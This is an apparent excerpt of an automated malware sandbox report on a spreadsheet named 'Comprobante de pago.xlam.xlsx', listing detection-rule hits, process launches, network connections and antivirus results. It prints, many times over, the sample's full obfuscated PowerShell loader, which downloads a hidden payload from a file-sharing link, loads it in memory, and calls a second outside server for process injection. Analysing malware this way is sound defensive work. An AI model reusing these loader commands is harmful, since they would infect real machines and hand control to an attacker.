hZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNkFkZEluUHJvY2VzczMyVFg2LCBUWDZkZXNhdGl2YWRvVFg2LCcrJyBUWDZkZXNhdGl2YWRvVFg2LFRYNicrJ1RYNixUWDZUWDYsVFg2VFg2LFRYNlRYNixUWDZUWDYsVFg2MVRYNikpOycpIC1DckVQbEFDRSAnV1ZvJyxbQ0hBUl0xMjQgIC1DckVQbEFDRSAgKFtDSEFSXTEyMCtbQ0hBUl0xMjErW0NIQVJdMTEyKSxbQ0hBUl0zNiAtQ3JFUGxBQ0UoW0NIQVJdODQrW0NIQVJdODgrW0NIQVJdNTQpLFtDSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCgoJ3h5cGltYWdlVXJsID0gVFg2aHR0cHM6Ly9kcml2ZS5nb29nbGUuJysnY28nKydtL3VjJysnP2V4cG9ydD1kb3dubG8nKydhZCZpZD0xLVdkZ2VxMGZYOWFBcGRsU1c5ZGxuMVBjX0tFR3BmSHAgVFg2O3h5cHdlYkNsaWVudCA9IE5ldy1PJysnYicrJ2plYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7eHlwaW1hZ2VCeXRlcyA9IHh5cHdlYkNsaWVudC5Eb3dubG9hZERhdGEoeHlwaW1hZ2VVcmwpO3h5cGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC4nKydFbmNvJysnZGluZ106OlVURjguR2V0U3RyaW5nKHh5cGltYWdlQicrJ3l0ZXMpO3h5cHN0YXJ0RmxhZyA9IFRYNjw8JysnQkFTRTY0X1NUQVJUPj5UWCcrJzY7eHlwZW5kRmxhZyA9IFRYNjw8JysnQkFTRTY0X0VORD4+VFg2O3h5cHN0YXJ0SScrJ25kZXggPSB4eXBpbWFnZVRleHQuSW5kZXgnKydPZih4eXBzdGFydEYnKydsYWcpO3gnKyd5cGVuZEluZGV4ID0geHlwaW0nKydhZ2VUZXh0LkluZGV4T2YoeHlwJysnZW5kRmxhZyk7eHlwc3RhcnRJbmRleCAtZ2UgMCAt
    Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3756, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49162
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaystuff.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaystuff.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3620, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaystuff.vbs" , ProcessId: 3756, ProcessName: wscript.exe
    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaystuff.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaystuff.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3620, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaystuff.vbs" , ProcessId: 3756, ProcessName: wscript.exe
    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCgoJ3h5cGltYWdlVXJsID0gVFg2aHR0cHM6Ly9kcml2ZS5nb29nbGUuJysnY28nKydtL3VjJysnP2V4cG9ydD1kb3dubG8nKydhZCZpZD0xLVdkZ2VxMGZYOWFBcGRsU1c5ZGxuMVBjX0tFR3BmSHAgVFg2O3h5cHdlYkNsaWVudCA9IE5ldy1PJysnYicrJ2plYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7eHlwaW1hZ2VCeXRlcyA9IHh5cHdlYkNsaWVudC5Eb3dubG9hZERhdGEoeHlwaW1hZ2VVcmwpO3h5cGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC4nKydFbmNvJysnZGluZ106OlVURjguR2V0U3RyaW5nKHh5cGltYWdlQicrJ3l0ZXMpO3h5cHN0YXJ0RmxhZyA9IFRYNjw8JysnQkFTRTY0X1NUQVJUPj5UWCcrJzY7eHlwZW5kRmxhZyA9IFRYNjw8JysnQkFTRTY0X0VORD4+VFg2O3h5cHN0YXJ0SScrJ25kZXggPSB4eXBpbWFnZVRleHQuSW5kZXgnKydPZih4eXBzdGFydEYnKydsYWcpO3gnKyd5cGVuZEluZGV4ID0geHlwaW0nKydhZ2VUZXh0LkluZGV4T2YoeHlwJysnZW5kRmxhZyk7eHlwc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHh5cGVuZEluZGV4JysnIC1ndCB4eXBzdGFydEluZGV4O3h5cHN0YXJ0SW5kZXggKz0gJysneHlwc3RhcnRGbGFnLkxlbmd0aDt4eXBiYXNlNjRMZW5ndGggPSB4JysneXBlbmRJbmRleCAtIHh5cHN0YXJ0SW5kZXg7eHlwYmFzZTY0Q29tbWFuZCA9IHh5cGltYWdlJysnVGV4dC5TdWJzdHJpbmcoeHlwc3RhcnRJbmRleCwgeHlwYmFzZTY0TGUnKyduZ3RoKScrJzt4eXBiYXNlNicrJzRSZXZlcnNlZCA9IC1qb2luICh4eXBiYXNlNjRDb21tYW5kLlRvQ2hhckEnKydycmF5KCkgV1ZvIEZvckVhY2gtJysnT2JqZWN0IHsgeHlwXyB9KVstMS4uLSh4eXBiJysnYXNlNjRDb21tYW5kLkxlbmd0aCldO3h5cGNvbW1hbmRCeXRlcycrJyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoeHlwYmFzZTY0UmV2ZXJzZWQpO3h5cGxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh4eXBjbycrJ21tYW5kQnl0ZXMpO3h5cHZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRobycrJ2QoVFg2VkFJVFg2KTt4eXB2YWlNZXRob2QuSW52b2tlKHh5cG51bGwsIEAoVFg2dHh0JysnLllBRFNFVVQvMjQxLjYxMi4zLjI5MS8vOnB0dGhUWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNkFkZEluUHJvY2VzczMyVFg2LCBUWDZkZXNhdGl2YWRvVFg2LCcrJyBUWDZkZXNhdGl2YWRvVFg2LFRYNicrJ1RYNixUWDZUWDYsVFg2VFg2LFRYNlRYNixUWDZUWDYsVFg2MVRYNikpOycpIC1DckVQbEFDRSAnV1ZvJyxbQ0hBUl0xMjQgIC1DckVQbEFDRSAgKFtDSEFSXTEyMCtbQ0hBUl0xMjErW0NIQVJdMTEyKSxbQ0hBUl0zNiAtQ3JFUGxBQ0UoW0NIQVJdODQrW0NIQVJdODgrW0NIQVJdNTQpLFtDSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCgoJ3h5cGltYWdlVXJsID0gVFg2aHR0cHM6Ly9kcml2ZS5nb29nbGUuJysnY28nKydtL3VjJysnP2V4cG9ydD1kb3dubG8nKydhZCZpZD0xLVdkZ2VxMGZYOWFBcGRsU1c5ZGxuMVBjX0tFR3BmSHAgVFg2O3h5cHdlYkNsaWVudCA9IE5ldy1PJysnYicrJ2plYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7eHlwaW1hZ2VCeXRlcyA9IHh5cHdlYkNsaWVudC5Eb3dubG9hZERhdGEoeHlwaW1hZ2VVcmwpO3h5cGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC4nKydFbmNvJysnZGluZ106OlVURjguR2V0U3RyaW5nKHh5cGltYWdlQicrJ3l0ZXMpO3h5cHN0YXJ0RmxhZyA9IFRYNjw8JysnQkFTRTY0X1NUQVJUPj5UWCcrJzY7eHlwZW5kRmxhZyA9IFRYNjw8JysnQkFTRTY0X0VORD4+VFg2O3h5cHN0YXJ0SScrJ25kZXggPSB4eXBpbWFnZVRleHQuSW5kZXgnKydPZih4eXBzdGFydEYnKydsYWcpO3gnKyd5cGVuZEluZGV4ID0geHlwaW0nKydhZ2VUZXh0LkluZGV4T2YoeHlwJysnZW5kRmxhZyk7eHlwc3RhcnRJbmRleCAtZ2UgMCAt
    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3756, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49162
    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex((('xypimageUrl = TX6https://drive.google.'+'co'+'m/uc'+'?export=downlo'+'ad&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp TX6;xypwebClient = New-O'+'b'+'jec'+'t System.Net.WebClient;xypimageBytes = xypwebClient.DownloadData(xypimageUrl);xypimageText = [System.Text.'+'Enco'+'ding]::UTF8.GetString(xypimageB'+'ytes);xypstartFlag = TX6<<'+'BASE64_START>>TX'+'6;xypendFlag = TX6<<'+'BASE64_END>>TX6;xypstartI'+'ndex = xypimageText.Index'+'Of(xypstartF'+'lag);x'+'ypendIndex = xypim'+'ageText.IndexOf(xyp'+'endFlag);xypstartIndex -ge 0 -and xypendIndex'+' -gt xypstartIndex;xypstartIndex += '+'xypstartFlag.Length;xypbase64Length = x'+'ypendIndex - xypstartIndex;xypbase64Command = xypimage'+'Text.Substring(xypstartIndex, xypbase64Le'+'ngth)'+';xypbase6'+'4Reversed = -join (xypbase64Command.ToCharA'+'rray() WVo ForEach-'+'Object { xyp_ })[-1..-(xypb'+'ase64Command.Length)];xypcommandBytes'+' = [System.Convert]::FromBase64String(xypbase64Reversed);xyploadedAssembly = [System.Reflection.Assembly]::Load(xypco'+'mmandBytes);xypvaiMethod = [dnlib.IO.Home].Ge'+'tMetho'+'d(TX6VAITX6);xypvaiMethod.Invoke(xypnull, @(TX6txt'+'.YADSEUT/241.612.3.291//:ptthTX6, TX6desativadoTX6, TX6desativadoTX6, TX6desativadoTX6, TX6AddInProcess32TX6, TX6desativadoTX6,'+' TX6desativadoTX6,TX6'+'TX6,TX6TX6,TX6TX6,TX6TX6,TX6TX6,TX61TX6));') -CrEPlACE 'WVo',[CHAR]124 -CrEPlACE ([CHAR]120+[CHAR]121+[CHAR]112),[CHAR]36 -CrEPlACE([CHAR]84+[CHAR]88+[CHAR]54),[CHAR]39))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex((('xypimageUrl = TX6https://drive.google.'+'co'+'m/uc'+'?export=downlo'+'ad&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp TX6;xypwebClient = New-O'+'b'+'jec'+'t System.Net.WebClient;xypimageBytes = xypwebClient.DownloadData(xypimageUrl);xypimageText = [System.Text.'+'Enco'+'ding]::UTF8.GetString(xypimageB'+'ytes);xypstartFlag = TX6<<'+'BASE64_START>>TX'+'6;xypendFlag = TX6<<'+'BASE64_END>>TX6;xypstartI'+'ndex = xypimageText.Index'+'Of(xypstartF'+'lag);x'+'ypendIndex = xypim'+'ageText.IndexOf(xyp'+'endFlag);xypstartIndex -ge 0 -and xypendIndex'+' -gt xypstartIndex;xypstartIndex += '+'xypstartFlag.Length;xypbase64Length = x'+'ypendIndex - xypstartIndex;xypbase64Command = xypimage'+'Text.Substring(xypstartIndex, xypbase64Le'+'ngth)'+';xypbase6'+'4Reversed = -join (xypbase64Command.ToCharA'+'rray() WVo ForEach-'+'Object { xyp_ })[-1..-(xypb'+'ase64Command.Length)];xypcommandBytes'+' = [System.Convert]::FromBase64String(xypbase64Reversed);xyploadedAssembly = [System.Reflection.Assembly]::Load(xypco'+'mmandBytes);xypvaiMethod = [dnlib.IO.Home].Ge'+'tMetho'+'d(TX6VAITX6);xypvaiMethod.Invoke(xypnull, @(TX6txt'+'.YADSEUT/241.612.3.291//:ptthTX6, TX6desativadoTX6, TX6desativadoTX6, TX6desativadoTX6, TX6AddInProcess32TX6, TX6desativadoTX6,'+' TX6desativadoTX6,TX6'+'TX6,TX6TX
    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaystuff.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaystuff.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3620, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaystuff.vbs" , ProcessId: 3756, ProcessName: wscript.exe
    Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3620, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCgoJ3h5cGltYWdlVXJsID0gVFg2aHR0cHM6Ly9kcml2ZS5nb29nbGUuJysnY28nKydtL3VjJysnP2V4cG9ydD1kb3dubG8nKydhZCZpZD0xLVdkZ2VxMGZYOWFBcGRsU1c5ZGxuMVBjX0tFR3BmSHAgVFg2O3h5cHdlYkNsaWVudCA9IE5ldy1PJysnYicrJ2plYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7eHlwaW1hZ2VCeXRlcyA9IHh5cHdlYkNsaWVudC5Eb3dubG9hZERhdGEoeHlwaW1hZ2VVcmwpO3h5cGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC4nKydFbmNvJysnZGluZ106OlVURjguR2V0U3RyaW5nKHh5cGltYWdlQicrJ3l0ZXMpO3h5cHN0YXJ0RmxhZyA9IFRYNjw8JysnQkFTRTY0X1NUQVJUPj5UWCcrJzY7eHlwZW5kRmxhZyA9IFRYNjw8JysnQkFTRTY0X0VORD4+VFg2O3h5cHN0YXJ0SScrJ25kZXggPSB4eXBpbWFnZVRleHQuSW5kZXgnKydPZih4eXBzdGFydEYnKydsYWcpO3gnKyd5cGVuZEluZGV4ID0geHlwaW0nKydhZ2VUZXh0LkluZGV4T2YoeHlwJysnZW5kRmxhZyk7eHlwc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHh5cGVuZEluZGV4JysnIC1ndCB4eXBzdGFydEluZGV4O3h5cHN0YXJ0SW5kZXggKz0gJysneHlwc3RhcnRGbGFnLkxlbmd0aDt4eXBiYXNlNjRMZW5ndGggPSB4JysneXBlbmRJbmRleCAtIHh5cHN0YXJ0SW5kZXg7eHlwYmFzZTY0Q29tbWFuZCA9IHh5cGltYWdlJysnVGV4dC5TdWJzdHJpbmcoeHlwc3RhcnRJbmRleCwgeHlwYmFzZTY0TGUnKyduZ3RoKScrJzt4eXBiYXNlNicrJzRSZXZlcnNlZCA9IC1qb2luICh4eXBiYXNlNjRDb21tYW5kLlRvQ2hhckEnKydycmF5KCkgV1ZvIEZvckVhY2gtJysnT2JqZWN0IHsgeHlwXyB9KVstMS4uLSh4eXBiJysnYXNlNjRDb21tYW5kLkxlbmd0aCldO3h5cGNvbW1hbmRCeXRlcycrJyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoeHlwYmFzZTY0UmV2ZXJzZWQpO3h5cGxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh4eXBjbycrJ21tYW5kQnl0ZXMpO3h5cHZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRobycrJ2QoVFg2VkFJVFg2KTt4eXB2YWlNZXRob2QuSW52b2tlKHh5cG51bGwsIEAoVFg2dHh0JysnLllBRFNFVVQvMjQxLjYxMi4zLjI5MS8vOnB0dGhUWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNkFkZEluUHJvY2VzczMyVFg2LCBUWDZkZXNhdGl2YWRvVFg2LCcrJyBUWDZkZXNhdGl2YWRvVFg2LFRYNicrJ1RYNixUWDZUWDYsVFg2VFg2LFRYNlRYNixUWDZUWDYsVFg2MVRYNikpOycpIC1DckVQbEFDRSAnV1ZvJyxbQ0hBUl0xMjQgIC1DckVQbEFDRSAgKFtDSEFSXTEyMCtbQ0hBUl0xMjErW0NIQVJdMTEyKSxbQ0hBUl0zNiAtQ3JFUGxBQ0UoW0NIQVJdODQrW0NIQVJdODgrW0NIQVJdNTQpLFtDSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCgoJ3h5cGltYWdlVXJsID0gVFg2aHR0cHM6Ly9kcml2ZS5nb29nbGUuJysnY28nKydtL3VjJysnP2V4cG9ydD1kb3dubG8nKydhZCZpZD0xLVdkZ2VxMGZYOWFBcGRsU1c5ZGxuMVBjX0tFR3BmSHAgVFg2O3h5cHdlYkNsaWVudCA9IE5ldy1PJysnYicrJ2plYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7eHlwaW1hZ2VCeXRlcyA9IHh5cHdlYkNsaWVudC5Eb3dubG9hZERhdGEoeHlwaW1hZ2VVcmwpO3h5cGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC4nKydFbmNvJysnZGluZ106OlVURjguR2V0U3RyaW5nKHh5cGltYWdlQicrJ3l0ZXMpO3h5cHN0YXJ0RmxhZyA9IFRYNjw8JysnQkFTRTY0X1NUQVJUPj5UWCcrJzY7eHlwZW5kRmxhZyA9IFRYNjw8JysnQkFTRTY0X0VORD4+VFg2O3h5cHN0YXJ0SScrJ25kZXggPSB4eXBpbWFnZVRleHQuSW5kZXgnKydPZih4eXBzdGFydEYnKydsYWcpO3gnKyd5cGVuZEluZGV4ID0geHlwaW0nKydhZ2VUZXh0LkluZGV4T2YoeHlwJysnZW5kRmxhZyk7eHlwc3RhcnRJbmRleCAtZ2UgMCAt
    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex((('xypimageUrl = TX6https://drive.google.'+'co'+'m/uc'+'?export=downlo'+'ad&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp TX6;xypwebClient = New-O'+'b'+'jec'+'t System.Net.WebClient;xypimageBytes = xypwebClient.DownloadData(xypimageUrl);xypimageText = [System.Text.'+'Enco'+'ding]::UTF8.GetString(xypimageB'+'ytes);xypstartFlag = TX6<<'+'BASE64_START>>TX'+'6;xypendFlag = TX6<<'+'BASE64_END>>TX6;xypstartI'+'ndex = xypimageText.Index'+'Of(xypstartF'+'lag);x'+'ypendIndex = xypim'+'ageText.IndexOf(xyp'+'endFlag);xypstartIndex -ge 0 -and xypendIndex'+' -gt xypstartIndex;xypstartIndex += '+'xypstartFlag.Length;xypbase64Length = x'+'ypendIndex - xypstartIndex;xypbase64Command = xypimage'+'Text.Substring(xypstartIndex, xypbase64Le'+'ngth)'+';xypbase6'+'4Reversed = -join (xypbase64Command.ToCharA'+'rray() WVo ForEach-'+'Object { xyp_ })[-1..-(xypb'+'ase64Command.Length)];xypcommandBytes'+' = [System.Convert]::FromBase64String(xypbase64Reversed);xyploadedAssembly = [System.Reflection.Assembly]::Load(xypco'+'mmandBytes);xypvaiMethod = [dnlib.IO.Home].Ge'+'tMetho'+'d(TX6VAITX6);xypvaiMethod.Invoke(xypnull, @(TX6txt'+'.YADSEUT/241.612.3.291//:ptthTX6, TX6desativadoTX6, TX6desativadoTX6, TX6desativadoTX6, TX6AddInProcess32TX6, TX6desativadoTX6,'+' TX6desativadoTX6,TX6'+'TX6,TX6TX6,TX6TX6,TX6TX6,TX6TX6,TX61TX6));') -CrEPlACE 'WVo',[CHAR]124 -CrEPlACE ([CHAR]120+[CHAR]121+[CHAR]112),[CHAR]36 -CrEPlACE([CHAR]84+[CHAR]88+[CHAR]54),[CHAR]39))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex((('xypimageUrl = TX6https://drive.google.'+'co'+'m/uc'+'?export=downlo'+'ad&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp TX6;xypwebClient = New-O'+'b'+'jec'+'t System.Net.WebClient;xypimageBytes = xypwebClient.DownloadData(xypimageUrl);xypimageText = [System.Text.'+'Enco'+'ding]::UTF8.GetString(xypimageB'+'ytes);xypstartFlag = TX6<<'+'BASE64_START>>TX'+'6;xypendFlag = TX6<<'+'BASE64_END>>TX6;xypstartI'+'ndex = xypimageText.Index'+'Of(xypstartF'+'lag);x'+'ypendIndex = xypim'+'ageText.IndexOf(xyp'+'endFlag);xypstartIndex -ge 0 -and xypendIndex'+' -gt xypstartIndex;xypstartIndex += '+'xypstartFlag.Length;xypbase64Length = x'+'ypendIndex - xypstartIndex;xypbase64Command = xypimage'+'Text.Substring(xypstartIndex, xypbase64Le'+'ngth)'+';xypbase6'+'4Reversed = -join (xypbase64Command.ToCharA'+'rray() WVo ForEach-'+'Object { xyp_ })[-1..-(xypb'+'ase64Command.Length)];xypcommandBytes'+' = [System.Convert]::FromBase64String(xypbase64Reversed);xyploadedAssembly = [System.Reflection.Assembly]::Load(xypco'+'mmandBytes);xypvaiMethod = [dnlib.IO.Home].Ge'+'tMetho'+'d(TX6VAITX6);xypvaiMethod.Invoke(xypnull, @(TX6txt'+'.YADSEUT/241.612.3.291//:ptthTX6, TX6desativadoTX6, TX6desativadoTX6, TX6desativadoTX6, TX6AddInProcess32TX6, TX6desativadoTX6,'+' TX6desativadoTX6,TX6'+'TX6,TX6TX
    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3832, TargetFilename: C:\Users\user\AppData\Local\Temp\ztogcjfq.tzz.ps1

    Data Obfuscation

    barindex
    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex((('xypimageUrl = TX6https://drive.google.'+'co'+'m/uc'+'?export=downlo'+'ad&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp TX6;xypwebClient = New-O'+'b'+'jec'+'t System.Net.WebClient;xypimageBytes = xypwebClient.DownloadData(xypimageUrl);xypimageText = [System.Text.'+'Enco'+'ding]::UTF8.GetString(xypimageB'+'ytes);xypstartFlag = TX6<<'+'BASE64_START>>TX'+'6;xypendFlag = TX6<<'+'BASE64_END>>TX6;xypstartI'+'ndex = xypimageText.Index'+'Of(xypstartF'+'lag);x'+'ypendIndex = xypim'+'ageText.IndexOf(xyp'+'endFlag);xypstartIndex -ge 0 -and xypendIndex'+' -gt xypstartIndex;xypstartIndex += '+'xypstartFlag.Length;xypbase64Length = x'+'ypendIndex - xypstartIndex;xypbase64Command = xypimage'+'Text.Substring(xypstartIndex, xypbase64Le'+'ngth)'+';xypbase6'+'4Reversed = -join (xypbase64Command.ToCharA'+'rray() WVo ForEach-'+'Object { xyp_ })[-1..-(xypb'+'ase64Command.Length)];xypcommandBytes'+' = [System.Convert]::FromBase64String(xypbase64Reversed);xyploadedAssembly = [System.Reflection.Assembly]::Load(xypco'+'mmandBytes);xypvaiMethod = [dnlib.IO.Home].Ge'+'tMetho'+'d(TX6VAITX6);xypvaiMethod.Invoke(xypnull, @(TX6txt'+'.YADSEUT/241.612.3.291//:ptthTX6, TX6desativadoTX6, TX6desativadoTX6, TX6desativadoTX6, TX6AddInProcess32TX6, TX6desativadoTX6,'+' TX6desativadoTX6,TX6'+'TX6,TX6TX6,TX6TX6,TX6TX6,TX6TX6,TX61TX6));') -CrEPlACE 'WVo',[CHAR]124 -CrEPlACE ([CHAR]120+[CHAR]121+[CHAR]112),[CHAR]36 -CrEPlACE([CHAR]84+[CHAR]88+[CHAR]54),[CHAR]39))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex((('xypimageUrl = TX6https://drive.google.'+'co'+'m/uc'+'?export=downlo'+'ad&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp TX6;xypwebClient = New-O'+'b'+'jec'+'t System.Net.WebClient;xypimageBytes = xypwebClient.DownloadData(xypimageUrl);xypimageText = [System.Text.'+'Enco'+'ding]::UTF8.GetString(xypimageB'+'ytes);xypstartFlag = TX6<<'+'BASE64_START>>TX'+'6;xypendFlag = TX6<<'+'BASE64_END>>TX6;xypstartI'+'ndex = xypimageText.Index'+'Of(xypstartF'+'lag);x'+'ypendIndex = xypim'+'ageText.IndexOf(xyp'+'endFlag);xypstartIndex -ge 0 -and xypendIndex'+' -gt xypstartIndex;xypstartIndex += '+'xypstartFlag.Length;xypbase64Length = x'+'ypendIndex - xypstartIndex;xypbase64Command = xypimage'+'Text.Substring(xypstartIndex, xypbase64Le'+'ngth)'+';xypbase6'+'4Reversed = -join (xypbase64Command.ToCharA'+'rray() WVo ForEach-'+'Object { xyp_ })[-1..-(xypb'+'ase64Command.Length)];xypcommandBytes'+' = [System.Convert]::FromBase64String(xypbase64Reversed);xyploadedAssembly = [System.Reflection.Assembly]::Load(xypco'+'mmandBytes);xypvaiMethod = [dnlib.IO.Home].Ge'+'tMetho'+'d(TX6VAITX6);xypvaiMethod.Invoke(xypnull, @(TX6txt'+'.YADSEUT/241.612.3.291//:ptthTX6, TX6desativadoTX6, TX6desativadoTX6, TX6desativadoTX6, TX6AddInProcess32TX6, TX6desativadoTX6,'+' TX6desativadoTX6,TX6'+'TX6,TX6TX
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: Comprobante de pago.xlam.xlsxAvira: detected
    Source: Comprobante de pago.xlam.xlsxReversingLabs: Detection: 68%

    Exploits

    barindex
